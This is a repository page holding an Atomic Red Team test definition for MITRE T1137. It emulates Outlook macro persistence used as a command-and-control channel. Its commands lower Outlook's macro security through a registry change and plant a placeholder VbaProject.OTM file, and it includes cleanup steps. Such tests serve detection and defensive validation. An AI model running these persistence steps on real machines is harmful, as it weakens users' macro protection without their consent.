security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1137/T1137.yaml
T
0xseiryuu bf100b8920 T1137 Office Application Startup fix (#3202) 
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2025-10-10 14:42:55 -07:00

23 lines
1.1 KiB
YAML
Raw Permalink Blame History

attack_technique: T1137
display_name: Office Application Startup
atomic_tests:
- name: Office Application Startup - Outlook as a C2
auto_generated_guid: bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c
description: |
As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/
it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands. This transform Outlook into a C2.
Too achieve this two things must happened on the syste
- The macro security registry value must be set to '1'
- A file called VbaProject.OTM must be created in the Outlook Folder.
supported_platforms:
- windows
executor:
command: |
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v Level /t REG_DWORD /d 1 /f
mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1
echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v Level /f >nul 2>&1
del %APPDATA%\Microsoft\Outlook\VbaProject.OTM >nul 2>&1
name: command_prompt
Reference in New Issue View Git Blame Copy Permalink